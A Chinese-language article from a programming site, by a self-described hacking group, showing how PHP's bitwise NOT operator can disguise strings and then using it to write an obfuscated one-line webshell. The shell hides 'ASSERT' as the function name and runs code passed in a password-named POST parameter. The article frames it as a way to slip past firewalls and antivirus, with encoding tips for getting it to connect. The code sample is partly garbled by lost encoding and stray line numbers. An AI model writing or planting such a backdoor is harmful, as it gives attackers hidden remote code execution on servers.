程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
 程式師世界 >> 編程語言 >> 網頁編程 >> PHP編程 >> 關於PHP編程 >> PHP中使用按位取反(~)函數創建後門

PHP中使用按位取反(~)函數創建後門

編輯:關於PHP編程

       1)PHP ~位運算符

      PHP: 位運算符 - http://www.php.net/manual/zh/language.operators.bitwise.php

      前一段時間老外在twitter上爆出個有趣的東西,一串疑似亂碼的字符串訪問後卻能正常輸出1337,於是便有了以下研究成果。

      ~ $a Not(按位取反) 將 $a 中為 0 的位設為 1,反之亦然。

      PHP 的 ini 設定 error_reporting 使用了按位的值,提供了關閉某個位的真實例子。要顯示除了提示級別之外的所有錯誤。

      php.ini 中是這樣用的: E_ALL & ~E_NOTICE

      具體運作方式是先取得 E_ALL 的值: 00000000000000000111011111111111

      再取得 E_NOTICE 的值: 00000000000000000000000000001000

      然後通過 ~ 將其取反: 11111111111111111111111111110111

      最後再用按位與 AND(&)得到兩個值中都設定了(為 1)的位: 00000000000000000111011111110111

      2)分析並重現

      這個就是當時最原始的代碼實現效果:

    PHP中使用按位取反(~)函數創建後門    三聯

      當看到這個效果的時候最先想到的就是繞過防火牆等後門的實現,之後開始考慮這是哪種編碼方式?

      後來同李普君測試中發現直接使用echo ~'1';等則會直接輸出以上的'亂碼',方到看完PHP官方~函數的解釋才恍然大悟。

    2.jpg

      那麼我們便可以開始寫一句話試試效果了:

      ?1

      2

      3

      4

      $x=~Ÿ¬¬º­«;

      $x($_POST[~¹¹ÏÏÏÏ]);

      ?>

    3.jpg

      這裡定義$x變量為ASSERT,然後密碼為FF0000直接鏈接後門便可,因為當位取反出來'亂碼'後我們再取一次反即可返回正常值。

      3)關於編碼與免殺

      當重現這個後門的時候我發現,直接Copy過來的直接HTTP狀態500,源頭是編碼問題,上面這種'亂碼'其實為西歐(ISO-8859-15)。

      實際過程中我們遇到了多次後門無法鏈接出現500的錯誤均勢因為編碼問題,如果默認編碼無法識別將編碼方式保存為這種即可(GBKUTF8...均不能成功使用)

    4.png

      Author: Evi1m0 [Email: evi1m0#ff0000.cc]

      From: 邪紅色信息安全組織 [FF0000 TeAm]

    1. 上一頁:
    2. 下一頁:
    Copyright © 程式師世界 All Rights Reserved